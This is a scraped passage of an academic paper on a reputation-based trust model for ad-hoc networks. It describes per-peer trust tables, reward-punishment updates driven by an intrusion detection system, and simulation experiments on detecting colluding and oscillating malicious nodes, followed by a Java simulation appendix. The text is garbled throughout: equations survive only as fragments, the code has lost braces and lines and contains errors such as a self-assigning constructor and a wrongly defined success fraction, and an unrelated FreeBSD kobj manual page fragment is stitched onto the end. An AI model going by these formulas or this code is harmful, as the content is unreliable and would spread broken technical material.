measure for the quality of prior collaborations. The following discussions do not differentiate between service provider and service requester because any of them can be malicious or honest at some point of time. Each peer i maintains a Table of Trust (ToT) in which each row corresponds to one peer that i interacted with in the past. The table stores: • The peer-ID. • Past Interaction Experience (PIE) value that corresponds to the quality of past interaction with hosting peer. • Number of times N peer i interacted with peer j. ID # Interactions 19AFC34 0.765 12DE542 0.456 345FAD1 0.823 … The trust value of peer i in peer j is not necessarily the same as the trust value of peer j in peer i. To compute how much trust peer i has in peer j, peer i asks other peers about their trust in j. Each peer k submits its recommendation (opinion) as a trust value then the collected values are weighted by how much i trust the submitting peers. The trust table ToT will be used by the hosting peer i in one of the following cases: • If peer j offers a service that peer i requested and if the requested service is available at more than one service provider, in this case, peer i chooses the most trusted peer to deal with. • If the peer i receives a request from peer j to use the services available at peer i; in this case, peer i would consult its ToT to decide whether it will offer its service to peer j or not. • Peer k requests an advice from peer i whether it should collaborate with peer j or not. Peer i sends the trust value that corresponds to peer j from its ToT. The trust value is affected and updated when one of the following occurs: • After the completion of a service request from peer j, peer i might change the trust value of peer j depending on the experience. Peer i demotes the trust in peer j if the performance of the system gets affected during the service or right after the service, e.g., if one of the resources slows down or become unavailable. Peer i can have an IDS which detects unusual behavior or attempts to overuse or access resources without permission. • After peer i asks for service access from peer j. peer i value of trust in peer j will be updated to reflect the quality of the collaboration. If the service was successful, the trust value for peer j will be promoted. If the service was not complete or the service has resulted in damage (e.g., virus), that value will be demoted. In a more formal way, a peer i uses T i (j) to decide whether to collaborate with peer j or not. T i (j) is computed as follows: () = (1 − ) × () + Where: × ∑ −2 =1 () × () ∑ () • T i (j) is a value that reflects the trust value of peer i in peer j. • PIE i (j) is a value that peer i maintains and reflect past interaction with peer j. • α (weight of second hand experience) is a weight for others’ recommendations and it is a real number between 0 and 1. • M is the number of peers which are contacted by peer i to give their recommendations. The parameter α can be tuned to give more or less importance to peer recommendations with respect to past interactions. Note that T i (j) is not stored in ToT but it is used to update the value of PIE and to decide whether to collaborate or not. If T i (j) is greater than a pre-defined threshold, T acc , collaboration is accepted, otherwise it is rejected. Another important parameter is the initialization of the trust values in ToT, i.e., bootstrapping issue. The model initializes the PIE values for all the peers to T acc + δ, where δ is a positive parameter. After each collaboration experience, an Intrusion Detection System (IDS) determines if the collaboration was successful or not. Since IDS might fail to detect some of the attacks, it is modeled by a probabilistic function. After every collaboration, the value of PIE is updated using a reward-punishment heuristic to limit the impact of malicious peers and eventually expel them. The value of PIE i (j) which is maintained by peer i and reflects the trust of peer i in peer j is updated as follows: Case of unsuccessful collaboration: Let S, N denote the number of successful collaborations and the ToTal number of collaborations between peer i and peer j respectively. Let PIE i (j) old be the value that corresponds to all peer i’s prior experiences with peer j. We define PIE i (j) old as the fraction N/S . In case of unsuccessful collaboration, the number of successful collaborations remains the same while the ToTal number of collaborations N increases. This means that: Hence, we have: Finally, we get: () = + 1 × + 1 () = () × Case of successful collaboration: In this case, the number of successful collaborations and the ToTal number of collaborations increase, thus: Finally: + 1 + + 1 Note that after any kind of collaboration N increases by 1. If T i (j) < T acc then PIE i (j) is demoted according to Equation (2), and no collaboration takes place between peer i and peer j. The decision whether to demote or promote PIE is made by the intrusion detection system depending on the quality of collaboration. Note that in general, T acc can be different from one peer to another. When a node joins the network and it does not have a previous knowledge about any of the nodes in the network it may face some bootstrapping issues. If it gives all other nodes a low PIE it will not interact with anyone. If it gives all nodes a high PIE it will be in a high risk. To solve this problem we introduced an initialization parameter we call it delta (δ) which will be used to initialize PIE. PIE of all nodes will be initialized to T acc + δ and it has to be set carefully so that interactions will happen and the situation will not be too risky. Figure 5: Collaboration flow diagram If an honest node was compromised and then recovered it will be very difficult to make people trust it again. We proposed a method to solve this issue by listening to the recommendations of the oscillating node without interacting with it. If the recommendations given by the oscillating nodes its PIE will be promoted that is if the oscillating nodes says someone is good and he is really good it will be promoted. If it says that someone is bad and he is really bad its PIE will promoted also. The most important measure for such a model is how fast the model can detect all the malicious nodes in the network. The other important measure is that can it detect all the malicious nodes with detecting non-malicious nodes as malicious (false rejection rate) and that the model does not miss a malicious node (false acceptance rate). We consider the number of interactions with malicious nodes as our measure of how fast the model can detect the malicious nodes (risky interactions). We would love to detect all malicious nodes with the minimum number of interactions with them to say that the network is as safe as possible. Risky interactions are defined as the number of interactions with malicious nodes until the detection of all malicious nodes. The percentage of risky interactions is calculated as the ratio between the number of interactions with malicious nodes until detection of all malicious nodes and the number of ToTal interactions until detection. We define the speed of detecting a malicious node as the slope of the change of its average PIE from all honest nodes. If we take one malicious node and observe the change of its PIE in all honest nodes it eventually will go below T acc . The slope of this change indicates how fast honest nodes can detect a malicious node. 6. Experiments A node is modeled as a data structure which consists of a table to store PIEs (ToT), a table to store the number of interactions for the corresponding nodes, and an ID for the node. The network is modeled as a collection of nodes and it will be initialized such that no two nodes have interacted with each other before. First of all we will not consider the mobility of the nodes in our experiments as it will not affect the performance of the trust in the application layer. We assume that every node has an IDS software installed in it that can detect malicious activities with some probability thus we model it as a probabilistic variable. Attacks that we consider are the attacks addressed in the IDS systems such as privacy compromise, sending a malicious code and unauthorized access. - Initialize all the nodes in the system: Set PIE with all nodes to T acc + δ. Set interactions with all nodes to 1 (not zero because it will cause an error in the trust calculation). Set the success with all nodes to zero. - Randomly choose nodes to be malicious (m malicious nodes). - Start simulation. Choose two nodes randomly to interact with each other. Update the trust: Take advice and calculate trust. If trust is less than T acc don’t interact and demote PIE. If trust is greater than T acc interact and then consult IDS. If the collaboration was successful promote PIE. Else demote PIE. Check for nodes which their PIE is less than T acc according to all trusted nodes and append them to an array. If the caught node is really malicious increment k. Loop until k is equal to the number of malicious nodes in the system. - Check for false positives. In this experiment we are trying to see how implementing the system in a network would improve its performance. The measure used here is the number of risky interactions and the defenseless network is stopped at the same number of ToTal interactions where the fortified network detects all malicious nodes. The IDS was responsible for deciding whether the interaction was successful or not. This experiment was done on a network with 50 nodes. The weight of the second hand experience was 0.5 and the initialization distance was 0.5 as well. IDS error rate was set to zero which is not realistic but we needed to isolate the effect of IDS to focus on the detection rate. % Malicious vs. Risky interactions % malicious nodes In this section two experiments were carried out. The first experiment measures the speed of detection of a malicious node in an environment where malicious nodes do not cooperate. The second experiment measures the speed of detecting a malicious node in an environment where malicious nodes cooperate. Malicious nodes cooperate in a fashion where they give their fellow malicious high recommendations when they are asked about their opinions. Malicious nodes also give low recommendations to other honest nodes when they are asked about their opinions in these nodes. This experiment was done on a network with 50 nodes, 5 of them are malicious. T acc was set to 0.5 and the weight of the second hand experience was set to 0.5 as well. PIEs in the table of trust of all nodes were initialized to T acc + 0.2. The IDS error rate was set to 0 which is not realistic but we need to isolate other parameters to get a benchmark for the slope of changing PIE. In this experiment we assume that malicious nodes attack but they do not lie when they are asked about their recommendations. Speed of detecting a malicious node number of interactions As seen from the graph above after around 30 interactions the average PIE of the malicious node dropped below T acc . Since we have 50 nodes and 5 of them are malicious then we have 45 honest nodes and only 30 of them had to interact with this malicious node in order for all of them to detect it. This experiment is measuring the speed of detecting a cooperating malicious node. The measure used is the average PIE of one of the cooperating malicious nodes. The cooperation of malicious nodes is that they give other malicious nodes high recommendations Speed of detecting a collaborating malicious node and they give honest nodes low recommendations. We define a parameter which is called lying distance where malicious nodes give recommendations as T acc + lying distance or T acc – lying distance. This experiment was done on a network with 50 nodes 5 of them are malicious. Weight of the second hand experience was 0.5 and T acc was 0.5 as well. The initialization distance was set to 0.2, the lying distance was set to 0.4 and the IDS error rate was zero. As noticed from the graph above the malicious node is detected after about 40 interactions. The number of interactions needed in this case is more than the previous because when a node asks about a malicious node it will get a higher rating because of its friends’ help. However even with this malicious collaboration all malicious nodes are detected and detecting each node by all honest nodes needs each node to collaborate with it only once. 6.5. Speed of detecting a malicious oscillating node This experiment measures the speed of detecting and oscillating malicious node which is a malicious node that acts honestly for a while and then it starts attacking. It was modeled as a node which starts as honest and when its average PIE goes above 0.8 it turns malicious. The experiment was done on a network with 25 nodes 1 of them is oscillating. The weight of the second hand experience was set to 0.5 and the T acc was set 0.5 as well. The initialization distance was 0.2 and the IDS error rate was zero. Speed of detecting an oscillating malicious node Number of risky interactions As noticed from the graph above the oscillating node got an average PIE above 0.8 after about 20 interactions. After that it started acting maliciously and it was detected after less than 40 interactions which is very good since it got a very high rating before attacking. This experiment measures the speed of recovering an honest node which was compromised and then got recovered. The speed of recovering is measured by the change of the average PIE of this node in the point of view of all other honest nodes. This experiment was done on a network with 25 nodes 1 of them was an oscillating node. The weight of the second hand experience was set to 0.5 and T acc was 0.5 as well. The initialization distance was 0.2 and the IDS error rate was zero. Speed of recovering an honest oscillating node number of risky interactions As noticed from the graph above the node’s average PIE goes below T acc after about 50 interactions. Then when the node recovers it needs about 30 interactions in order for other nodes to trust it again. This experiment measures the change of the IDS error rate versus the percentage of risky interactions. Our model highly depends on the accuracy of the IDS because it is the component that measures the quality of the interaction. This experiment was done on a network with 25 nodes 4 of them are malicious. The weight of second hand experience was set to 0.5 and T acc was 0.5 as well. The initialization distance was set to 0.2 and the IDS error rate was set to zero. IDS error rate vs. percentage of risky interactions IDS error rate As noticed from the above graph when the IDS error rate goes increases the number of risky interactions increases exponentially. However it stays reasonable up to 15% IDS error rate. 6.5.3. Weight of second hand experience vs. percentage of risky interactions This experiment measures the effect of changing the weight of the second hand experience on the percentage of risky interactions. This experiment is done on a network with 50 nodes 10 of them are malicious. The initialization distance was set to 0.2 and T acc was set to 0.5. IDS error rate was set to zero and the weight of second hand experience was changed from 0 to 1 incremented by 0.05. The malicious nodes are cooperating by giving their friends T acc + 0.4 when they are asked about their opinion and they give others T acc – 0.4. If the malicious nodes do not lie when they are asked about their opinion the weight of second hand experience will not have an effect on the system because all the opinions are honest and it does not matter how much weight is given to each one. weight of second hand experience vs. % risky interactions Weight of second hand experience As noticed from the graph above when the node depends more on others’ opinions and a lot of them are lying the percentage of risky interactions increases. This means in such environment it is better to choose a lower weight of second hand experience. In our proposed model, we developed a trust model for ad-hoc networks. The main concern of this model is to provide trustful community that can find and eliminate malicious nodes. We also focus the efforts on the level of services provided by or required by the node rather than forwarding or receiving packets. This makes our work different from the main stream of trust models found in the literature. 29 Our model encourages honest collaborations and has a very high detection rate of malicious nodes. Through conducting several experiments, we could proof the robustness of our model. Our main contribution to the literature is our method of detecting oscillating nodes and collaborative attackers. [1] ml C. Adams, S. Farrell, "Internet X.509 Public Key Infrastructure: Certificate Management Protocols", March 1999. [3] P. R. Zimmerman. Pretty Good Privacy. In The Official PGP User’s Guide. MIT Press, April 1995. [4] G. Zacharia and P. Maes, Trust Management through Reputation Mechanisms Applied Artificial Intelligence, vol. 14, no. 8, 2000. [5] Y. Ren, A. Boukerche, Modeling and managing the trust for wireless and mobile ad hoc networks, in: Proceeding of the IEEE International Conference on Communications (ICC), 2008. [6] S. D. Kamvar, M. T. Schlosser, and H. Garcia-Molina. The eigentrust algorithm for reputation management in P2P networks. In Proceedings of the 12 th International World Wide Web Conference, pages 640–651, 2003. [7] P. Veeraraghavan and V. Limaye, Trust in mobile Ad Hoc Networks. In Proceedings of the IEEE International Conference on Telecommunications, 2007. [8] H. Yang, H. Shu, X. Meng, and S. Lu. SCAN: Selforganized network-layer security in mobile ad hoc networks. IEEE J. Selected Areas in Commun., 24(2):261--273, Feb. 2006. [9] R. Zhou and K. Hwang, “PowerTrust: A Robust and Scalable Reputation System for Trusted P2P Computing”, IEEE Trans. on Parallel and Distributed Systems, accepted to appear 2007. [10] T. Anantvalee, J. Wu, “A Survey on Intrusion Detection in Mobile Ad Hoc Networks”, Wireless/Mobile Network Security: Springer 2006, Ch7, pp. 170 – 196. [11] K. Aberer , Z. Despotovic, “Managing trust in a peer-2-peer information system”, Proceedings of the tenth international conference on Information and knowledge management, October 05-10, 2001, Atlanta, Georgia, USA [12] R. Chen and W. Yeager. Poblano: A distributed trust model for peer-to-peer networks. Technical report, Sun Microsystems, Santa Clara, CA, USA, February [2] 2003. [13] B. Wu, J. Chen, J. Wu, and M. Cardei, “A Survey of Attacks and Countermeasures in Mobile Ad Hoc Networks” in “Wireless Network Security”, 31 Y. Xiao, X. Shen, and D.Z. Du , Springer, Network Theory and Applications, Vol. 17, 2006, ISBN: 0-387-28040-5. [14] Y. Hu, A. Perrig, and D. Johnson, Packet Leashes: A Defense Against Wormhole Attacks in Wireless Ad Hoc Networks. Proc. of IEEE INFORCOM, 2002. [15] J. van der Merwe, D. Dawoud, and S. McDonald, A Survey on Peer-to-Peer Key Management for Military Type Mobile Ad Hoc Networks, in proc. Military Information and Communications Symposium of South Africa (MICSSA'05), 2005. Class ToT import java.util.Hashtable; public class ToT { private class pair { double PIE; int numOfInteractions; public pair(double PIE, int inter) { PIE = PIE; numOfInteractions = inter; } private Hashtable<Integer, pair> table; public ToT() { table = new Hashtable<Integer, pair>(); public void add(int id, double p, int in) { table.put(id, new pair(p, in)); public double getPIE(int ID) { return table.get(ID).PIE; public int getNumOfInteractions(int ID) { return table.get(ID).numOfInteractions; public void update(int id, double newPIE, int newNumOfInt) { table.remove(id); table.put(id, new pair(newPIE, newNumOfInt)); Class node import java.util.Random; public class node { /** * weight of the second hand experience */ private static double a; * Table of trust as a hashtable where the keys are the nodes' IDS */ private ToT ToT; * number of neighbors */ private static int N; * Minimum accepted trust */ private static double Tacc; * boolean to set malicious nodes */ private boolean mal; * Mode of lying: n - no lying r - random recomendations d - distance lying (+ * for freinds) (- for others) */ private static char lying; * distance of lying in case of lying mode d */ private static double dl; * initialization distance */ private static double d; * the node's ID */ private int ID; * IDS error rate */ private static double IDSError; * honest oscillating honest node that was compromised 34 */ private boolean osHon; * malicious oscillating act well to gain trust then attack */ private boolean osMal; public node(int id) { ID = id; ToT = new ToT(); * initializes the table of trust of the node @param neighbors */ public void initializeToT(node[] neighbors) { Random rand = new Random(System.currentTimeMillis()); int i = 0; if (mal) { if (lying == 'n') { for (i = 0; i < neighbors.length; i++) if (neighbors[i].getID() != this.ID) ToT.add(neighbors[i].getID(), Tacc + d, 1); else if (lying == 'r') { for (i = 0; i < neighbors.length; i++) { if (neighbors[i].getID() != this.ID) ToT.add(neighbors[i].getID(), rand.nextDouble(), 1); else if (lying == 'd') { for (i = 0; i < neighbors.length; i++) { if (neighbors[i].getID() != this.ID) { if (!neighbors[i].isMal()) { ToT.add(neighbors[i].getID(), Tacc + dl, 1); } else if (neighbors[i].isMal()) { ToT.add(neighbors[i].getID(), Tacc - dl, 1); } else if (!mal) { for (i = 0; i < neighbors.length; i++) if (neighbors[i].getID() != this.ID) ToT.add(neighbors[i].getID(), Tacc + d, 1); interact with node i and consult IDS @param i @return true if interaction was successful and false otherwise */ public boolean interact(node i) { if (i.getID() == this.ID) { System.err.println("Error: cannot interact with self"); return false; 35 // double IDS; // Random rand = new Random(System.currentTimeMillis()); // IDS = rand.nextDouble(); /* * if (i.isMal()) { if (IDS >= (1 - IDSError)) return true; else return * false; } else */ return true; promote node i and incerement number of interactions and update ToT */ private void promote(node i) { double newPIE; int newNumOfInt; newNumOfInt = this.ToT.getNumOfInteractions(i.getID()); newPIE = this.ToT.getPIE(i.getID()) * ((double) newNumOfInt / (double) (newNumOfInt + 1)); newPIE += (1.0 / (newNumOfInt + 1)); newNumOfInt++; ToT.update(i.getID(), newPIE, newNumOfInt); demote node i and increment number of interactions if there was one and update ToT @param interacted */ private void demote(node i, boolean interacted) { * ((double) newNumOfInt / (double) (newNumOfInt + 1)); if (interacted) newNumOfInt++; ToT.update(i.getID(), newPIE, newNumOfInt); compute trust, interact with node i if trust > Tacc, consult IDS and @return true if an interaction occured and false otherwise */ public boolean interactAndUpdateTrust(node x, node[] neighbors) { 36 if (x.getID() == this.ID) { System.err.println("Error: cannot interact with self"); return false; double trust; double IDS; int i; Random rand = new Random(System.currentTimeMillis()); trust = this.computeTrust(x, neighbors); // System.out.println("trust: " + trust); if (trust < node.Tacc) { if (this.getRecomendation(x) > node.Tacc) this.demote(x, false); return false; } else { if (x.isMal()) IDS = rand.nextDouble(); else IDS = 1; if (IDS >= (1 - IDSError)) { this.promote(x); for (i = 0; i < node.N; i++) { if (neighbors[i].getID() != this.getID() && this.getRecomendation(neighbors[i]) < node.Tacc) if (neighbors[i].getRecomendation(x) >= node.Tacc) this.promote(neighbors[i]); return true; } else { this.demote(x, true); for (i = 0; i < node.N; i++) { if (neighbors[i].getID() != this.getID() && this.getRecomendation(neighbors[i]) < node.Tacc) if (neighbors[i].getRecomendation(x) < node.Tacc) this.promote(neighbors[i]); public double computeTrust(node j, node neighbors[]) { double adviceSum = 0; double trustSum = 0; double trust; int i; for (i = 0; i < neighbors.length; i++) { if (neighbors[i].getID() != ID && neighbors[i].getID() != j.getID()) { adviceSum += ((ToT.getPIE(neighbors[i].getID())) * (neighbors[i] .getRecomendation(j))); trustSum += ToT.getPIE(j.ID); trust = (1.0 - node.a) * (this.ToT.getPIE(j.getID())) + node.a 37 * (adviceSum / trustSum); return trust; public static void setTacc(double acc) { Tacc = acc; public static void setN(int n) { N = n; public static void setAlpha(double r) { a = r; public static void setLying(char x) { lying = x; public static void setLyingDist(double x) { dl = x; public static void setInitDist(double x) { d = x; public boolean isMal() { return this.mal; public boolean isOsMal() { return this.osMal; public boolean isOsHon() { return this.osHon; public void setMal() { mal = true; public void unSetMal() { mal = false; public void setOsMal() { osMal = true; public void setOsHon() { osHon = true; public int getID() { return ID; public void setID(int id) { 38 ID = id; public static void setIDSError(double error) { IDSError = error; public static double getTacc() { return Tacc; public static double getDist() { return d; public double getRecomendation(node i) { if (getID() != i.getID()) return ToT.getPIE(i.getID()); else return 0.0; public int getNumOfInteractions(node i) { return ToT.getNumOfInteractions(i.getID()); Class network import java.io.BufferedWriter; import java.io.FileWriter; import java.io.IOException; import java.util.Arrays; import java.util.Random; public class network { private int s;// size of the network private node[] net; private int malicious; private int oscillatingMal; private int oscillatingHon; private int falsePositive; private int rejected_healthy; private char mode; private char oscMode; private final int max = 100000000; // maximum number of allowed // interactions private Random rand; private int testingNodeMal; // the ID of the malicious node that is tested private double avgTrustMal; // the average PIE of the malicious node that is // tested private boolean penalize; // penalize nodes that give worng recommendation // or not private int trials;// ToTal number of tried collaborations private boolean defenseless; public network(String FileName, int n, int m, double a, double tac, double de, int iter, char mod, double tol, char LM, double dis, boolean pen, boolean def, char osmod, int osc) throws IOException { BufferedWriter out = new BufferedWriter(new FileWriter(FileName + ".xls")); double[] rr; int[] mm; int i; int iterations = 0; 40 int tes = 0; int div = iter; rejected_healthy = 0; rand = new Random(System.currentTimeMillis()); penalize = pen; defenseless = def; mode = mod; oscMode = osmod; out .write("\t\t\tnodes\tmalicious\ta\tTacc\tdelta\titerations\t" + "mode\tIDS error\tlying mode\tlying dist\tpenalize\n"); out.write("\t\t\t" + n + "\t" + m + "\t" + a + "\t" + tac + "\t" + de + "\t" + iter + "\t" + mode + "\t" + tol + "\t" + LM + "\t" + dis + "\t" + penalize + "\n"); // change alpha if (mode == 'a') { rr = generateArray(0, 1, 0.05); // double[] rr = {0.5}; out .write("weight of 2nd hand\tinteractions\tfalsePositive" + "\trejected healthy\ttrials\n"); for (double r : rr) { System.out.println(r); falsePositive = 0; iterations = 0; div = iter; rejected_healthy = 0; trials = 0; for (i = 0; i < iter; i++) { initializeNetwork(n, r, tac, LM, m, dis, de, tol, osc); tes = testNetwork(); if (tes < max) iterations += tes; else div--; iterations /= div; System.out.println(div); out.write(1 - r + "\t" + iterations + "\t" + ((double) falsePositive / (double) div) / s + "\t" + (double) rejected_healthy / (double) (trials - iterations) + "\t" + ((double) trials / (double) div) + "\n"); // change Tacc else if (mode == 't') { rr = generateArray(0.1, 1, 0.01); out .write("Tacc\tinteractions\tfalsePositive\trejected" + " healthy\ttrials\n"); for (double r : rr) { System.out.println(r); falsePositive = 0; iterations = 0; rejected_healthy = 0; trials = 0; 41 for (i = 0; i < iter; i++) { this.initializeNetwork(n, a, r, LM, m, dis, de, tol, osc); tes = testNetwork(); if (tes < max) iterations += tes; else div--; iterations /= div; out.write(r + "\t" + iterations + "\t" + (double) falsePositive / (double) div / s + "\t" + (double) rejected_healthy / (double) (trials - iterations) + "\t" // change number of nodes else if (mode == 'n') { mm = generateArray(10, n, 1); .write("#nodes\tinteractions\tfalsePositive\trejected" + " healthy\ttrials\n"); for (int r : mm) { System.out.println(r); falsePositive = 0; iterations = 0; rejected_healthy = 0; trials = 0; for (i = 0; i < iter; i++) { this.initializeNetwork(r, a, tac, LM, m, dis, de, tol, osc); tes = testNetwork(); if (tes < max) iterations += tes; else div--; / (double) trials + "\t" + ((double) trials / (double) div) + "\t" + malicious + "\n"); // change number of malisious nodes else if (mode == 'm') { = generateArray(5, m, 5); .write("#malicious\tinteractions\tfalsePositive\trejected" + " healthy\ttrials\n"); for (int r : mm) { System.out.println((int) (n * (r / 100.0))); falsePositive = 0; iterations = 0; rejected_healthy = 0; trials = 0; for (i = 0; i < iter; i++) { // System.out.println(i); 42 this.initializeNetwork(n, a, tac, LM, r, dis, de, tol, osc); tes = testNetwork(); if (tes < max) iterations += tes; else div--; iterations /= div; trials /= div; out.write(r + "\t" + ((double) iterations / (double) trials) * 100.0 + "\t" + (double) falsePositive / (double) div + "\t" + (double) rejected_healthy + ((double) trials / (double) div) + "\t" + div + "\n"); // change delta else if (mode == 'd') { rr = generateArray(0.0, de, 0.05); out .write("distance\tinteractions\tfalsePositive\trejected" + for (double r : rr) { rejected_healthy = 0; trials = 0; for (i = 0; i < iter; i++) { this.initializeNetwork(n, a, tac, LM, m, dis, 0.5 - r, tol, osc); tes = testNetwork(); if (tes < max) iterations += tes; else div--; // change IDS error rate else if (mode == 'i') { malicious = m; rr = generateArray(0.0, tol, 0.05); out .write("IDS error\tinteractions\tfalsePositive\trejected" + rejected_healthy = 0; trials = 0; 43 for (i = 0; i < iter; i++) { this.initializeNetwork(n, a, tac, LM, m, dis, de, r, osc); tes = testNetwork(); if (tes < max) iterations += tes; else div--; out.write(r + "\t" + iterations + "\t" + falsePositive + "\t" + (double) rejected_healthy // test avg PIE for a malicious node else if (mode == '-') { iterations = 0; trials = 0; out .write("interactions\tfalsePositive\trejected" + " healthy\ttrials\n"); // System.out.println("********************************\n\n\n\n"); this.initializeNetwork(n, a, tac, LM, m, dis, de, tol, osc); tes = testNetwork(); if (tes < max) iterations += tes; else { // break; div--; iterations /= div; out.write(iterations + "\t" + (double) falsePositive / (double) div / s + "\t" + (double) rejected_healthy / (double) trials + "\t" + ((double) (trials - iterations) / (double) div) + "\n"); System.out.println(); // System.out.println(div); out.close(); public void initializeNetwork(int n, double al, double tacc, char lMode, int mal, double lDist, double initDist, double IDSError, int os) { int i; net = new node[n]; s = n; malicious = (int) (n * (mal / 100.0)); oscillatingMal = (int) (n * (os / 100.0)); oscillatingHon = (int) (n * (os / 100.0)); node.setAlpha(al); node.setTacc(tacc); node.setLying(lMode); node.setInitDist(initDist); node.setLyingDist(lDist); node.setIDSError(IDSError); 44 // creating nodes and giving them IDS for (i = 0; i < s; i++) { if (net[i] == null) net[i] = new node(i); // initialize nodes' ToTs for (i = 0; i < s; i++) { net[i].initializeToT(net); // setting malicious nodes int r1; if (oscMode != 'm' && oscMode != 'h') { for (i = 0; i < malicious; i++) { r1 = rand.nextInt(n); if (!net[r1].isMal()) { if (mode == '-') // setting malicious node to test speed // of // detection testingNodeMal = r1; net[r1].setMal(); } else i--; else if (oscMode == 'm') { for (i = 0; i < oscillatingMal; i++) { r1 = rand.nextInt(n); if (!net[r1].isOsMal()) { testingNodeMal = r1; net[r1].setOsMal(); } else if (oscMode == 'h') { for (i = 0; i < oscillatingHon; i++) { r1 = rand.nextInt(n); if (!net[r1].isOsHon()) { testingNodeMal = r1; net[r1].setOsHon(); // System.out.println("finished initialization"); Test Network @param size @param tol 45 * @param A * @return * @throws IOException */ public int testNetwork() throws IOException { BufferedWriter out = new BufferedWriter(new FileWriter( "Trust_change.xls")); out.write("avg PIE\n"); // ***************************************************** // initialize network // ***************************************************** int inter = 0; int i, j; int[] mali = new int[s]; int k = 0;// number of detected nodes inter = 0; int one; int two; boolean interacted = false; int x, y, z, l; boolean bool; z l = 0; for (j = 0; j < s; j++) { mali[j] = s + 1; // ******************************************************* // start interaction // ******************************************************** // System.out.println("Starting reaction."); while (k < malicious && z <= max) { one = rand.nextInt(s); two = rand.nextInt(s); interacted = false; if (one != two) { trials++; if (!defenseless) { interacted = net[one].interactAndUpdateTrust(net[two], net); // if(net[two].isMal()) // System.out.println("trust updated: " + one + " " + two + // " trust " + net[one].getRecomendation(net[two])); } else { interacted = net[one].interact(net[two]); // System.out.println("interacted."); for (x = 0; x < s; x++) { bool = true; for (y = 0; y < s; y++) { if (y != x && !net[y].isMal()) { if (net[y].getRecomendation(net[x]) < node .getTacc()) { bool = bool & true; } else bool = false; 46 if (bool) { if (Arrays.binarySearch(mali, x) < 0) { mali[l] = x; l++; if (net[x].isMal()) { k++; Arrays.sort(mali); z++; // ************************************************************ // Trust Change Test // ************************************************************ if (mode == '-' && oscMode != 'm' && oscMode != 'h') { avgTrustMal = 0; if (two == testingNodeMal) { for (j = 0; j < s; j++) { if (j != testingNodeMal && !net[j].isMal()) avgTrustMal += net[j] .getRecomendation(net[testingNodeMal]); avgTrustMal /= (s - malicious); out.write(avgTrustMal + "\n"); } else if (oscMode == 'm') { int num = 0; for (i = 0; i < s; i++) { if (net[i].isOsMal()) { num = 0; avgTrustMal = 0; for (j = 0; j < s; j++) { if (!net[j].isOsMal() && !net[j].isMal()) { avgTrustMal += net[j] .getRecomendation(net[i]); num++; avgTrustMal /= num; if (two == testingNodeMal) out.write(inter + "\t" + avgTrustMal + "\n"); if (avgTrustMal >= 0.8) net[i].setMal(); } else if (oscMode == 'h') { int num = 0; k = 0; for (i = 0; i < s; i++) { if (net[i].isOsHon()) { num = 0; avgTrustMal = 0; for (j = 0; j < s; j++) { if (!net[j].isOsHon() && !net[j].isMal()) { avgTrustMal += net[j] .getRecomendation(net[i]); num++; 47 avgTrustMal /= num; if (two == testingNodeMal) out.write(inter + "\t" + avgTrustMal + "\n"); if (avgTrustMal < 0.3) net[i].unSetMal(); if (avgTrustMal > 0.7 && !net[i].isMal()) z = max + 1; if (interacted && net[two].isMal()) { // System.out.print(i++ + "\r"); inter++; /* * check for false positives */ //System.out.println("Number of iterations untill detection: " + // inter); System.out.println("malisous nodes detected: "); try { for (j = 0; j < s; j++) { System.out.print(mali[j] + " "); if (mali[j] < s) { if (!net[mali[j]].isMal()) falsePositive++; } catch (ArrayIndexOutOfBoundsException e) { System.out.println("error"); System.out.println(e.getMessage()); // return max; return inter; function to fill an array of type double with values between start end and incremented by step @param start @param end @param step @return array */ public static double[] generateArray(double start, double end, double step){ double[] array; int i = 0; int size = (int) ((end - start) / step) + 1; array = new double[size]; 48 array[0] = start; for (i = 1; i < size; i++) array[i] = array[i - 1] + step; return array; function to fill an array of type int with values between start and end and incremented by step */ public static int[] generateArray(int start, int end, int step) { int[] array; int i = 0; int size = (end - start) / step + 1; array = new int[size]; public static void main(String[] args) { if (args.length != 13) { System.err .println("Specify args: fileName #nodes, #malicious, " + "alpha, Tacc, delta, iteration, mode, " + "IDS error rate, lying Model, lying distance " + "value, penalize"); System.err .println("----------------------------------------------"); System.err.println("Modes: a \tfix all and change alpha"); System.err.println(" System.err t \tfix all and change Tacc"); n \tfix all and change number of nodes"); .println(" m \tfix all and change number of " + "malicious nodes"); System.err d \tfix all and change distance from " + "Tacc for initializing PIE"); i \tfix all and change IDS error rate"); - \tfix all"); .println("-----------------------------------------------"); .println("Lying Modes: r \tmalicious nodes give random" + " recommendations"); System.err d \tmalicious nodes give " + "Tacc+distance to other malicious " + "nodes\n\t\tand Tacc-distance to Honest nodes"); 49 n \tno lying"); .println("\nif you want to take advice from all nodes" + " set advice_all to 1\nif you want it from" + trusted nodes only set it to 0"); .println("\nif you want to penalize nodes that give high" + " trust for malicious\npeers set penalize to" + " 1 if you don't set it to 0"); } else if (args.length == 13) { try { network Net = new network(args[0], Integer.parseInt(args[1]), Integer.parseInt(args[2]), Double.parseDouble(args[3]), Double.parseDouble(args[4]), Double .parseDouble(args[5]), Integer .parseInt(args[6]), args[7].charAt(0), Double .parseDouble(args[8]), args[9].charAt(0), Double.parseDouble(args[10]), args[11].equals("1"), args[12].equals("1"), args[13].charAt(0), Integer .parseInt(args[14])); } catch (IOException e) { e.printStackTrace(); Class Main import java.awt.BorderLayout; import java.awt.Dimension; import java.awt.Font; import java.awt.Rectangle; import java.awt.event.ActionEvent; import java.io.IOException; import javax.swing.ButtonGroup; import javax.swing.JButton; import javax.swing.JCheckBox; import javax.swing.JFrame; import javax.swing.JLabel; import javax.swing.JPanel; import javax.swing.JProgress.
https://de.scribd.com/document/125471561/TRUST-MODEL-FOR-AD-HOC-NETWORKS
CC-MAIN-2020-24
refinedweb
10,088
55.34
NAME kobj - a kernel object system for FreeBSD SYNOPSIS #include <sys/param.h> #include <sys/kobj.h> void kobj_class_compile(kobj_class_t cls); void kobj_class_compile_static(kobj_class_t cls, kobj_ops_t ops); void kobj_class_free(kobj_class_t cls); kobj_t kobj_create(kobj_class_t cls, struct malloc_type *mtype, int mflags); void kobj_init(kobj_t obj, kobj_class_t cls); void kobj_delete(kobj_t obj, struct malloc_type *mtype); DEFINE_CLASS(name, kobj_method_t *methods, size_t size); DESCRIPTION The kernel object system implements an object-oriented programming system in the FreeBSD kernel. The system is based around the concepts of interfaces, which are descriptions of sets of methods; classes, which are lists of functions implementing certain methods from those interfaces; and objects, which combine a class with a structure in memory. Methods are called using a dynamic method dispatching algorithm which is designed to allow new interfaces and classes to be introduced into the system at runtime. The method dispatch algorithm is designed to be both fast and robust and is only slightly more expensive than a direct function call, making kernel objects suitable for performance-critical algorithms. Suitable uses for kernel objects are any algorithms 